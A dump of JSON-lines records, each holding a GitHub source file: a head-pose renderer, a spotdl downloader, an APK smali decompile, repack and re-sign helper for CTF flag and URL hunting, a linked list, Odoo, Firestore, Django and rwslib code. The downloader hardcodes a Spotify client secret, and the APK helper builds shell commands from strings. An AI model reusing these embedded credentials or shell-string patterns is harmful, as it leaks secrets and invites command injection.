dtype='float32').reshape(3, 1)\n zaxis = np.array(([0, 0, -1 * scale]), dtype='float32').reshape(3, 1)\n zaxis1 = np.array(([0, 0, 1 * scale]), dtype='float32').reshape(3, 1)\n o = np.array(([0, 0, 0]), dtype='float32').reshape(3, 1)\n o[2] = camera_matrix[0][0]\n xaxis = np.dot(R, xaxis) + o\n yaxis = np.dot(R, yaxis) + o\n zaxis = np.dot(R, zaxis) + o\n zaxis1 = np.dot(R, zaxis1) + o\n xp2 = (xaxis[0] / xaxis[2] * camera_matrix[0][0]) + cx\n yp2 = (xaxis[1] / xaxis[2] * camera_matrix[1][1]) + cy\n p2 = (int(xp2), int(yp2))\n cv2.line(frame, (cx, cy), p2, (0, 0, 255), 2)\n xp2 = (yaxis[0] / yaxis[2] * camera_matrix[0][0]) + cx\n yp2 = (yaxis[1] / yaxis[2] * camera_matrix[1][1]) + cy\n p2 = (int(xp2), int(yp2))\n cv2.line(frame, (cx, cy), p2, (0, 255, 0), 2)\n xp1 = (zaxis1[0] / zaxis1[2] * camera_matrix[0][0]) + cx\n yp1 = (zaxis1[1] / zaxis1[2] * camera_matrix[1][1]) + cy\n p1 = (int(xp1), int(yp1))\n xp2 = (zaxis[0] / zaxis[2] * camera_matrix[0][0]) + cx\n yp2 = (zaxis[1] / zaxis[2] * camera_matrix[1][1]) + cy\n p2 = (int(xp2), int(yp2))\n cv2.line(frame, p1, p2, (255, 0, 0), 2)\n cv2.circle(frame, p2, 3, (255, 0, 0), 2)\n return frame\n\n\n # from : https://knowledge.udacity.com/questions/171017\n def build_camera_matrix(self, center_of_face, focal_length):\n cx = int(center_of_face[0])\n cy = int(center_of_face[1])\n camera_matrix = np.zeros((3, 3), dtype='float32')\n camera_matrix[0][0] = focal_length\n camera_matrix[0][2] = cx\n camera_matrix[1][1] = focal_length\n camera_matrix[1][2] = cy\n camera_matrix[2][2] = 1\n return camera_matrix\n","repo_name":"BrainTheos/openvino-computer-pointer-controller-project","sub_path":"starter/src/head_pose_estimation.py","file_name":"head_pose_estimation.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40653973084","text":"from spotdl.download import DownloadManager\nfrom spotdl.parsers 
import parse_query\nfrom spotdl.search import SpotifyClient, SongObject, from_spotify_url\nfrom spotdl.providers import metadata_provider\nfrom spotdl.utils.song_name_utils import format_name\n\nimport sqlite3\nimport os\nimport shutil\n\n# Initialize spotify client id & secret is provided by spotdl no need to keep secret\nSpotifyClient.init(\n client_id=\"5f573c9620494bae87890c0f08a60293\",\n client_secret=\"212476d9b0f3472eaa762d90b19b0ba8\",\n user_auth=False,\n)\n\ndef search_query(query: str):\n \"\"\"\n THIS FUNCTION TAKES search query AS INPUT AND RETURN\n a `list`.\n \"\"\" \n songs = [] # This list contains searchSongObject for each song\n list_song_urls = []\n # get a spotify client\n spotify_client = SpotifyClient()\n\n # Use spotify search\n search_results = spotify_client.search(query, type=\"track\")\n\n number_of_search_results = len(search_results.get(\"tracks\", {}).get(\"items\", []))\n\n # return first result link or if no matches are found, raise Exception\n if search_results is None or number_of_search_results == 0:\n raise Exception(\"No song matches found on Spotify\")\n\n # Adds each song url to list_song_urls\n for i in range(0, number_of_search_results):\n # Get the Song Metadata\n song_url = \"http://open.spotify.com/track/\" + search_results[\"tracks\"][\"items\"][i][\"id\"]\n raw_track_meta, raw_artist_meta, raw_album_meta = metadata_provider.from_url(song_url)\n\n # for searchSongObject\n song_name = search_results[\"tracks\"][\"items\"][i][\"name\"]\n cover_url = search_results[\"tracks\"][\"items\"][i][\"album\"][\"images\"][0][\"url\"]\n contributing_artists = [artist[\"name\"] for artist in raw_track_meta[\"artists\"]] \n duration = search_results[\"tracks\"][\"items\"][i][\"duration_ms\"] / 1000 # convert to seconds\n\n list_song_urls.append(song_url)\n # create SongObject and append to songs[]\n song = searchSongObject(song_url, contributing_artists, song_name, duration, cover_url)\n songs.append(song)\n\n return songs\n\n# This is to display in /search because creating SongObject would mean you have to use youtube API, which takes too long\nclass searchSongObject:\n def __init__(self,\n spotify_url: str,\n contributing_artists: list,\n song_name: str,\n duration: float, \n album_cover_url: str) -> None:\n\n self._spotify_url = spotify_url\n self._contributing_artists = contributing_artists\n self._song_name = song_name\n self._duration = duration\n self._album_cover_url = album_cover_url\n \n @property\n def spotify_url(self):\n return self._spotify_url\n \n @property\n def contributing_artists(self):\n return self._contributing_artists\n \n @property\n def song_name(self):\n return self._song_name\n \n @property\n def duration(self):\n return self._duration\n \n @property\n def album_cover_url(self):\n return self._album_cover_url\n\n @property\n def file_name(self):\n return self.create_file_name(self._song_name, self._contributing_artists)\n\n @staticmethod\n def create_file_name(song_name: str, song_artists: list[str]) -> str:\n # build file name of converted file\n # the main artist is always included\n artist_string = song_artists[0]\n\n # ! we eliminate contributing artist names that are also in the song name, else we\n # ! would end up with things like 'Jetta, Mastubs - I'd love to change the world\n # ! 
(Mastubs REMIX).mp3' which is kinda an odd file name.\n for artist in song_artists[1:]:\n if artist.lower() not in song_name.lower():\n artist_string += \", \" + artist\n\n converted_file_name = artist_string + \" - \" + song_name\n\n return format_name(converted_file_name)\n\nclass ManageDownloads:\n \"\"\"\n Download songs as .oggs files by using Spotify search API on title and artist\n name in track_metadata.db & spotdl and saves it in a folder\n \"\"\"\n def __init__(self):\n # track_metadata.db has one table called songs\n # Establish connection and init cursor to database \n self.connection = sqlite3.connect(\"track_metadata.db\")\n self.cursor = self.connection.cursor()\n print(\"Successfully connected to db\\n\")\n def download_songs_using_track_metadata_db(self):\n ret = []\n self.cursor.execute(\"SELECT title, artist_name FROM songs LIMIT 20\")\n data = self.cursor.fetchall()\n\n if os.path.isdir(\"./songs\"):\n pass\n else:\n os.makedirs(\"./songs\")\n\n for row in range(len(data)):\n # data[row][0] = title # of song\n # data[row][1] = artist_name # of song\n if data[row][0] == '' or data[row][1] == '':\n continue\n # title, artist_name\n search_param = f\"{data[row][0]}, {data[row][1]}\"\n print(f\"Searching '{search_param}' using Spotify search API...\")\n spotify_url = \"\"\n try: \n spotify_url = search_query(search_param)[0].spotify_url\n except:\n print(f\"failed to find match on Spotify\\n\")\n continue\n\n print(f\"{spotify_url}\\n\")\n spotdl_opts = {\n \"query\": [spotify_url],\n \"output_format\": \"ogg\",\n \"download_threads\": 1, \n \"path_template\": None,\n \"use_youtube\": False,\n \"generate_m3u\": False,\n \"search_threads\": 1, \n }\n # song_obj is a SongObject from spotdl.search.SongObject\n song_obj = parse_query(\n spotdl_opts[\"query\"],\n spotdl_opts[\"output_format\"],\n spotdl_opts[\"download_threads\"],\n spotdl_opts[\"path_template\"],\n spotdl_opts[\"use_youtube\"],\n spotdl_opts[\"generate_m3u\"],\n spotdl_opts[\"search_threads\"],\n )\n if os.path.isfile(f\"./{song_obj[0].file_name}.ogg\") or os.path.isfile(f\"./songs/{song_obj[0].file_name}.ogg\"):\n # change download status by changing downloaded column in db\n self.cursor.execute(\"UPDATE songs SET downloaded=? WHERE title=? AND artist_name=?\", [1, data[row][0], data[row][1]])\n self.connection.commit()\n # if file name already exists skip download\n print(f\"{song_obj[0].file_name}.ogg already downloaded\")\n continue \n try:\n DownloadManager(spotdl_opts).download_single_song(song_obj[0])\n # Move to ./songs directory)\n shutil.move(f\"{song_obj[0].file_name}.ogg\", './songs/')\n # change download status by changing downloaded column in db\n self.cursor.execute(\"UPDATE songs SET downloaded=? WHERE title=? 
AND artist_name=?\", [1, data[row][0], data[row][1]])\n self.connection.commit()\n except OSError:\n continue\n \n #print(bytes(data[17][0], 'utf-8').decode('unicode_escape'))\n \ndef main():\n data = ManageDownloads()\n data.download_songs_using_track_metadata_db()\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"bobcoi03/SongRecommendation","sub_path":"src/data/download_oggs.py","file_name":"download_oggs.py","file_ext":"py","file_size_in_byte":7402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8006780100","text":"# !/usr/bin/env python3\n\nimport os\nimport re\nfrom colorama import Fore\n\n\ndef smali_de(apk_name):\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SOURCE EXTRATION IN SMALI\\n\")\n snamesplit = apk_name.split('.')[0]\n print(Fore.YELLOW)\n smalicmd = 'java -jar tools/apktool.jar d -f ' + apk_name + ' -o Bytecode'\n os.system(smalicmd)\n if os.path.isdir(snamesplit):\n print(Fore.BLUE + \"\\n\\t[+] \" + Fore.YELLOW + \"Extraction complete\")\n\n\ndef smali_re(apk_name):\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"RECOMPILING SMALI\")\n snamesplit = apk_name.split('.')[0]\n if os.path.isdir(snamesplit):\n smalicmd = 'java -jar tools/apktool.jar b -f Bytecode' \n os.system(smalicmd)\n print(Fore.YELLOW)\n print(Fore.BLUE + \"\\n\\t[+] \" + Fore.YELLOW + \"Recompiling complete.\")\n print(Fore.BLUE + \"\\n\\t[+] \" + Fore.YELLOW + \"The recompiled apk in Bytecode/dist/Bytecode.apk\\n\")\n else:\n print(Fore.RED + \"\\n\\t[!] smali source not found\")\n\n\ndef apk_sign(apk_name):\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SIGNING APK\")\n snamesplit = apk_name.split('.')[0]\n sdir = snamesplit + '/dist/' + snamesplit + '.apk'\n if os.path.exists(sdir):\n signcmd = 'java -jar tools/sign.jar Bytecode/dist/Bytecode.apk'\n os.system(signcmd)\n print(Fore.YELLOW)\n msg = \"Signed APK found as: \" + snamesplit + \"/dist/Bytecode.s.apk\"\n print(Fore.BLUE + \"[+] \" + Fore.YELLOW + msg)\n else:\n print(Fore.RED + \"\\n\\t[!] file not found\")\n\n\n# noinspection PyUnusedLocal,PyUnusedLocal,PyUnusedLocal\ndef inj_check(apk_name, flag_format=''):\n snamesplit = apk_name.split('.')[0]\n if os.path.isdir('Bytecode') == 0:\n print(Fore.RED + \"\\n\\t[!] bytecode not found. 
Extracting\")\n smali_de(apk_name)\n print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"CHECKING FOR BYTECODE INJECTIONS\\n\\n\")\n inj_points = 0\n flag_count = 0\n check = 0\n url_count = 0\n urls = []\n smali_dir = 'smali'\n flag_regex = re.compile(r\"\" + str(flag_format) + \"{[a-z0-9]}*\", re.IGNORECASE)\n url_regex = 'https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+'\n flags = []\n if os.path.isdir('smali_analysis'):\n os.system('rm -r smali_analysis')\n os.system('cp -R Bytecode/' + smali_dir + ' smali_analysis')\n if os.path.isdir('smali_analysis'):\n os.chdir('smali_analysis')\n ignore_dirs = ['android', 'org', 'google', 'localytics']\n for dirList, subdirList, subfiles in os.walk(os.getcwd()):\n # noinspection PyAssignmentToLoopOrWithParameter\n for subfiles in ignore_dirs:\n os.system('rm -r ' + subfiles + ' 2> /dev/null')\n # noinspection PyAssignmentToLoopOrWithParameter\n for subdirList in ignore_dirs:\n os.system('rm -r ' + subdirList + ' 2> /dev/null')\n # noinspection PyAssignmentToLoopOrWithParameter\n for dirList in ignore_dirs:\n os.system('rm -r ' + dirList + ' 2> /dev/null')\n\n for dirList, subdirList, subfiles in os.walk(os.getcwd()):\n for files in subfiles:\n with open(os.path.abspath(os.path.join(dirList, files))) as f:\n for lines in f:\n pattern1 = 'const-string'\n if re.search(flag_regex, lines):\n flags.append(lines)\n if re.search(url_regex, lines):\n urls.append(lines)\n if pattern1 in lines:\n inj_points += 1\n to_write = \"\\n\\t\" + os.path.basename(f.name) + \"\\t:\" + lines\n if os.path.exists(\"smali_analysis/str_inj.txt\"):\n os.system(\"rm -r smali_analysis/str_inj.txt\")\n with open(\"str_inj.txt\", \"a+\") as strfile:\n strfile.write(to_write)\n if 0 < inj_points < 10 and len(lines) < 100:\n print(Fore.BLUE + \"\\t[>] \" + Fore.YELLOW + os.path.basename(f.name) + \"\\t:\" + lines)\n else:\n check = 1\n\n print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + str(inj_points) + \" strings found. 
Injections possible\\n\")\n        if check == 1:\n            print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + \"Constant strings written to 'str_inj.txt' file in 'smali_analysis' directory\\n\")\n\n    print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n    print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SEARCHING FOR CTF FLAGS\\n\")\n    if flags:\n        with open(\"ctf_flags.txt\", \"a+\") as ctf_file:\n            for flag in flags:\n                start = flag.find(flag_format)\n                # make the end index absolute; str.find on the slice returns an offset relative to start\n                end = start + flag[start:].find('}') + 1\n                if start != -1 and flag[start:end] != \"\":\n                    flag_count += 1\n                    ctf_file.write(\"\\n\" + flag[start:end])\n                    if 0 < flag_count < 10:\n                        print(\"\\n\\t\" + Fore.BLUE + \"[>] \" + Fore.YELLOW + flag[start:end])\n        if flag_count == 0:\n            print(Fore.RED + \"\\n\\t[-] No flags found \")\n            exit(0)\n        print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + str(flag_count) + \" flag formats found\")\n        print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + \"All the flags written to 'ctf_flags.txt' file in \" + Fore.BLUE + \"'smali_analysis'\" + Fore.YELLOW + \" directory\")\n\n    print(Fore.YELLOW + \"\\n--------------------------------------------------\")\n    print(Fore.GREEN + \"[INFO] \" + Fore.BLUE + \"SEARCHING FOR URLs\\n\\n\")\n    if urls:\n        with open(\"urls.txt\", \"a+\") as url_file:\n            for foundurls in urls:\n                url_file.write(foundurls.split()[2][1:-1] + \"\\n\")\n                url_count += 1\n                if 0 < url_count < 10:\n                    print(Fore.BLUE + \"\\t[>] \" + Fore.YELLOW + foundurls.split()[2][1:-1])\n        print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + str(url_count) + \" urls found\")\n        print(Fore.BLUE + \"\\n\\t\\t[+] \" + Fore.YELLOW + \"All the URLs written to 'urls.txt' file in \" + Fore.BLUE + \"'smali_analysis'\" + Fore.YELLOW + \" directory\")\n","repo_name":"SamarthSriv/Aegis","sub_path":"recons/smali_extract.py","file_name":"smali_extract.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71196697334","text":"# Creating a class called Node\nclass Node:\n    # Constructor and self\n    def __init__(self, data, next_node=None):\n        self.data = data\n        self.next_node = next_node\n\n# Reverse Linked List Function\ndef reverse_linked_list(starting_head_node):\n    current_node = starting_head_node # We will always start with the starting_head_node\n    # and set the starting_head_node node as current\n\n    previous_node = None # Previous node is set to null\n\n    while current_node is not None: # While the current_node is not\n    # null keep looping\n\n        next_node = current_node.next_node # Assign the next_node to the\n        # next_node of the current_node\n\n        current_node.next_node = previous_node # Assign the next_node of the\n        # current_node to the previous_node\n\n        previous_node = current_node # Assign the previous_node to\n        # the current_node\n\n        current_node = next_node # Assign the current_node to the\n        # next_node\n\n    return previous_node # Returning previous_node\n\n# Printing the Linked List\ndef linked_list(starting_head_node):\n    structure = \"\" # Blank\n    current_node = starting_head_node\n    # Using loop to print the list\n    while current_node:\n        structure = structure + str(current_node.data) + \" --> \"\n        current_node = current_node.next_node\n    print(structure)\n\n# Testing Data\nprint(\"\\nGiven Linked List:\")\nstarting_head_node = Node(1, Node(2, Node(3, Node(4, Node(5)))))\nlinked_list(starting_head_node)\nprint(\"\\nReversed Linked List:\")\nrev = reverse_linked_list(starting_head_node)\nlinked_list(rev)\n\n# Output:\n# Given Linked 
List:\n# 1 --> 2 --> 3 --> 4 --> 5 --> \n\n# Reversed Linked List:\n# 5 --> 4 --> 3 --> 2 --> 1 --> \n\n","repo_name":"bootkernel/Interview-Questions","sub_path":"reverse_linked_list.py","file_name":"reverse_linked_list.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73247459254","text":"from datetime import datetime\n\nfrom odoo import _, fields, models\nfrom odoo.exceptions import UserError\nfrom odoo.tools import date_utils\n\n\nclass VehicleChangeHistory(models.TransientModel):\n \"\"\"Vehicle Change History.\"\"\"\n\n _name = \"vehicle.change.history\"\n _description = \"Vehicle Change History\"\n\n fleet_id = fields.Many2one(\"fleet.vehicle\", string=\"Vehicle-ID\")\n date_from = fields.Date(default=date_utils.start_of(datetime.now(), \"month\"))\n date_to = fields.Date(default=date_utils.end_of(datetime.now(), \"month\"))\n report_type = fields.Selection(\n [\n (\"engine_history\", \"Engine History\"),\n (\"color_history\", \"Color History\"),\n (\"tire_history\", \"Tire History\"),\n (\"battery_history\", \"Battery History\"),\n ],\n default=\"color_history\",\n )\n\n def print_report(self):\n \"\"\"Method to print report.\"\"\"\n for rec in self:\n if not rec.date_from and not rec.date_to:\n raise UserError(\n _(\n \"User Error!\\n 'Please select criteria \"\n \"to create Vehicle Change History Report!\"\n )\n )\n if rec.date_from and rec.date_to and rec.date_from > rec.date_to:\n raise UserError(\n _(\"User Error!\\n Date To' must \" \"be greater than 'Date From'!\")\n )\n data = {\n \"form\": {\n \"date_from\": rec.date_from or False,\n \"date_to\": rec.date_to or False,\n \"fleet_id\": rec.fleet_id and rec.fleet_id.id or False,\n \"report\": rec.report_type,\n }\n }\n return self.env.ref(\n \"fleet_operations.action_report_vehicle_change_history\"\n ).report_action(self, data=data, config=False)\n","repo_name":"JayVora-SerpentCS/fleet_management","sub_path":"fleet_operations/wizard/vehicle_change_history.py","file_name":"vehicle_change_history.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"70113346292","text":"import time\nimport json\nimport copy\nimport os\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nfrom dotenv import load_dotenv\nload_dotenv() \n\ndef get_firestore_env_var():\n try:\n # this isn't letting us use env vars for some reason. 
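
Editor's note: for contrast with the iterative three-pointer loop in reverse_linked_list.py above, the same reversal can be written recursively. This sketch reuses that file's Node class and its next_node attribute, and costs O(n) call-stack depth:

def reverse_recursive(head):
    # Base case: an empty or single-node list is already reversed.
    if head is None or head.next_node is None:
        return head
    new_head = reverse_recursive(head.next_node)  # reverse the tail first
    head.next_node.next_node = head               # point the old successor back at us
    head.next_node = None                         # sever the stale forward link
    return new_head
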
fix later & use service accounts \n # json_content = os.environ.get('FIRESTORE_APPLICATION_CREDENTIALS', 'Specified environment variable for the firestore is not set.')\n # cred = json.loads(json_content)\n cred = credentials.Certificate(\"/Users/adam/development/ps5-stock-selector-config/ps5-stock-selector-firebase.json\")\n return cred\n except:\n cred = credentials.Certificate()\n return cred\n \n# cred = credentials.Certificate(get_firestore_env_var() )\n\nfirebase_admin.initialize_app(get_firestore_env_var())\n\ndef throttle_check_store_sku(store_sku):\n \"\"\" Will look at the last time we sent a message for the store and then \n decide if we want to throttle\n \"\"\"\n db = firestore.client()\n document_ref = db.collection('throttle').document(store_sku)\n print(f\"looking for {store_sku}\")\n document = document_ref.get().to_dict()\n print(document)\n ouput = document['last_sent']\n \n return ouput\n\ndef throttle_update_store_sku(store_sku, time_value=int(time.time()) ):\n \"\"\" Will update the store sku timestamp with the latest time\n \"\"\"\n \n # time_now = int(time.time()) #epoch time int\n db = firestore.client()\n batch = db.batch()\n\n document_ref = db.collection(u'throttle').document(store_sku)\n batch.update(document_ref, {u'last_sent': time_value})\n\n batch.commit()\n\ndef throttle_dict(input_dict, throttle_time_secs=1200):\n \"\"\"\n Takes the dictionary of stores which have matches \n and will see if we're okay to let them through. \n Will return dict with stores which are okay to send \n based on the rules we specify in the ENVIRONMENT VARIABLE for \n THROTTLE_TIME\n Default is 20 mins (1200seconds)\n \"\"\"\n output_dict = copy.deepcopy(input_dict) #deep copy will allow us to work with this copy uniquely\n\n for key in input_dict:\n for sku in [\"disc\",\"digital\"]:\n if input_dict[key][sku] != None and input_dict[key][sku] != \"\":\n firestore_key = f\"{key}_{sku}\"\n time_now = int(time.time())\n last_sent = throttle_check_store_sku(firestore_key)\n if time_now < (last_sent + throttle_time_secs):\n output_dict[key][sku] = None #clear the value since we've sent it recently\n print(f\"We're not going to send an update for {firestore_key} as we notified less than {throttle_time_secs} seconds ago\")\n else:\n throttle_update_store_sku(firestore_key,time_now)\n\n return output_dict\n\n\n# print(throttle_check_store_sku(\"amazon_digital\") )","repo_name":"anthonypiccolo/ps5-stock-checker-backend","sub_path":"src/messaging/throttle.py","file_name":"throttle.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2494380820","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom blog.models import Recipe, Ingredient, Comment\n\n\nclass IngredientModelTest(TestCase):\n \"\"\"Tests for the Ingredient model.\"\"\"\n\n def test_string_representation(self):\n \"\"\"Checks if string representation returns the ingredient's name.\"\"\"\n recipe = Recipe.objects.create(\n title=\"Test Recipe\", slug=\"test-recipe\", estimated_time=30\n )\n ingredient = Ingredient.objects.create(\n recipe=recipe,\n ingredient=\"Sample Ingredient\",\n unit=\"kg\",\n amount=5\n )\n self.assertEqual(str(ingredient), \"Sample Ingredient\")\n\n\nclass RecipeModelTest(TestCase):\n \"\"\"Tests for the Recipe model.\"\"\"\n\n def test_ordering(self):\n \"\"\"\n Checks if recipes are ordered by their creation in descending order.\n \"\"\"\n Recipe.objects.create(\n 
title=\"Recipe 1\", slug=\"recipe-1\", estimated_time=30\n )\n Recipe.objects.create(\n title=\"Recipe 2\", slug=\"recipe-2\", estimated_time=40\n )\n recipes = Recipe.objects.all()\n self.assertEqual(recipes[0].title, \"Recipe 2\")\n self.assertEqual(recipes[1].title, \"Recipe 1\")\n\n def test_slug_uniqueness(self):\n \"\"\"Verifies that the slug field is unique.\"\"\"\n Recipe.objects.create(\n title=\"Recipe 1\", slug=\"recipe-1\", estimated_time=30\n )\n with self.assertRaises(Exception):\n Recipe.objects.create(\n title=\"Recipe 2\", slug=\"recipe-1\", estimated_time=40\n )\n\n def test_number_of_likes(self):\n \"\"\"Verifies that the number_of_likes method returns correct count.\"\"\"\n user1 = User.objects.create(username=\"user1\")\n user2 = User.objects.create(username=\"user2\")\n recipe = Recipe.objects.create(\n title=\"Recipe\", slug=\"recipe\", estimated_time=30\n )\n recipe.likes.add(user1, user2)\n self.assertEqual(recipe.number_of_likes(), 2)\n\n\nclass CommentModelTest(TestCase):\n \"\"\"Tests for the Comment model.\"\"\"\n\n def test_string_representation(self):\n \"\"\"\n Verifies correct string format 'Comment {comment_body} by {user_name}'.\n \"\"\"\n recipe = Recipe.objects.create(\n title=\"Test Recipe\", slug=\"test-recipe\", estimated_time=30\n )\n comment = Comment.objects.create(\n name=\"User 1\", body=\"Comment 1\", recipe=recipe\n )\n self.assertEqual(str(comment), \"Comment Comment 1 by User 1\")\n\n def test_comment_ordering(self):\n \"\"\"Checks if comments are ordered by their creation order.\"\"\"\n recipe = Recipe.objects.create(\n title=\"Test Recipe\", slug=\"test-recipe\", estimated_time=30\n )\n Comment.objects.create(\n name=\"User 1\", body=\"Comment 1\", recipe=recipe\n )\n Comment.objects.create(\n name=\"User 2\", body=\"Comment 2\", recipe=recipe\n )\n comments = Comment.objects.all()\n self.assertEqual(comments[0].body, \"Comment 1\")\n self.assertEqual(comments[1].body, \"Comment 2\")\n","repo_name":"Haniibani/Portfolio-project-4","sub_path":"blog/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31847397373","text":"import re\r\nimport sys\r\n\r\n\r\ndef match_regex(filename, regex):\r\n with open(filename) as file:\r\n lines = file.readlines()\r\n for line in reversed(lines):\r\n match = re.match(regex, line)\r\n if match:\r\n regex = yield match.groups()[0]\r\n\r\n\r\ndef get_serials(filename):\r\n ERROR_RE = \"XFS ERROR (\\[sd[a-z]\\])\"\r\n matcher = match_regex(filename, ERROR_RE)\r\n device = next(matcher)\r\n while True:\r\n try:\r\n bus = matcher.send(\r\n \"(sd \\S+) {}.*\".format(re.escape(device)))\r\n serial = matcher.send(\"{} \\(SERIAL=([^)]*)\\)\".format(bus))\r\n yield serial\r\n device = matcher.send(ERROR_RE)\r\n except StopIteration:\r\n matcher.close()\r\n return\r\n\r\n\r\n# get file name from input command line\r\nfile = sys.argv[1]\r\nfor serial_number in get_serials(file):\r\n print(serial_number)\r\n","repo_name":"LesterBryanIlao/Python3ObjectOrientedProgramming","sub_path":"Chapter9/coroutine.py","file_name":"coroutine.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27496534791","text":"# -*- coding: utf-8 -*-\n\nfrom rwslib.builders.common import ODMElement, dt_to_iso8601\nfrom rwslib.builders.clinicaldata import LocationRef\nfrom rwslib.builders.constants 
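
Editor's note: the generator in coroutine.py above is driven through the send() protocol — next() primes it to the first match, and each send() both delivers the next regex and resumes the scan. A minimal in-memory demo of that handshake; the log lines are made-up sample data:

import re

def match_regex_lines(lines, regex):
    # Same shape as match_regex in coroutine.py, but over a list of strings.
    for line in reversed(lines):
        match = re.match(regex, line)
        if match:
            regex = yield match.groups()[0]

log = [
    "sd 0:0:0:0 [sda] Attached SCSI disk (SERIAL=ZG12345)",
    "XFS ERROR [sda]",
]
matcher = match_regex_lines(log, r"XFS ERROR (\[sd[a-z]\])")
device = next(matcher)                                          # -> '[sda]'
bus = matcher.send(r"(sd \S+) {}.*".format(re.escape(device)))  # -> 'sd 0:0:0:0'
print(device, bus)
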
import LocationType, UserType\nfrom rwslib.builders.modm import LastUpdateMixin\n\n\nclass AdminData(ODMElement):\n \"\"\"\n Administrative information about users, locations, and electronic signatures.\n \"\"\"\n def __init__(self, study_oid=None):\n \"\"\"\n :param str study_oid: OID pointing to the StudyDef\n \"\"\"\n super(AdminData, self).__init__()\n self.study_oid = study_oid\n self.users = []\n self.locations = []\n # SignatureDef\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = {}\n if self.study_oid:\n params.update(dict(StudyOID=self.study_oid))\n builder.start(\"AdminData\", params)\n for user in self.users:\n user.build(builder)\n for location in self.locations:\n location.build(builder)\n\n builder.end(\"AdminData\")\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n\n if not isinstance(other, (User, Location,)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n\n self.set_list_attribute(other, User, 'users')\n self.set_list_attribute(other, Location, 'locations')\n\n return other\n\n\nclass MetaDataVersionRef(ODMElement):\n \"\"\"\n A reference to a MetaDataVersion used at the containing Location. \n The EffectiveDate expresses the fact that the metadata used at a location can vary over time.\n \"\"\"\n def __init__(self, study_oid, metadata_version_oid, effective_date):\n \"\"\"\n :param str study_oid: References the :class:`Study` that uses this metadata version.\n :param str metadata_version_oid: References the :class:`rwslib.builders.MetaDataVersion` (within the above Study).\n :param datetime.datetime effective_date: Effective Date for this version and Site\n \"\"\"\n super(MetaDataVersionRef, self).__init__()\n self.study_oid = study_oid\n self.metadata_version_oid = metadata_version_oid\n self.effective_date = effective_date\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict(StudyOID=self.study_oid,\n MetaDataVersionOID=self.metadata_version_oid,\n EffectiveDate=dt_to_iso8601(self.effective_date))\n builder.start(\"MetaDataVersionRef\", params)\n builder.end(\"MetaDataVersionRef\")\n\n\nclass Location(ODMElement, LastUpdateMixin):\n \"\"\"\n A physical location -- typically a clinical research site or a sponsor's office.\n \"\"\"\n def __init__(self, oid, name,\n location_type=None,\n metadata_versions=None):\n \"\"\"\n :param str oid: OID for the Location, referenced in :class:`LocationRef`\n :param str name: Name for the Location\n :param rwslib.builder_constants.LocationType location_type: Type for this Location\n :param list(MetaDataVersionRef) metadata_versions: The :class:`MetaDataVersionRef` for this Location\n \"\"\"\n super(Location, self).__init__()\n self.oid = oid\n self.name = name\n self._location_type = None\n if location_type:\n self.location_type = location_type\n self.metadata_versions = []\n if metadata_versions:\n if isinstance(metadata_versions, (tuple, list)):\n for mdv in metadata_versions:\n self << mdv\n elif isinstance(metadata_versions, (MetaDataVersionRef,)):\n self << metadata_versions\n\n @property\n def location_type(self):\n return self._location_type\n\n @location_type.setter\n def location_type(self, value):\n if not isinstance(value, (LocationType,)):\n raise ValueError(\"{} is not a LocationType\".format(type(value)))\n self._location_type = value\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict(OID=self.oid,\n 
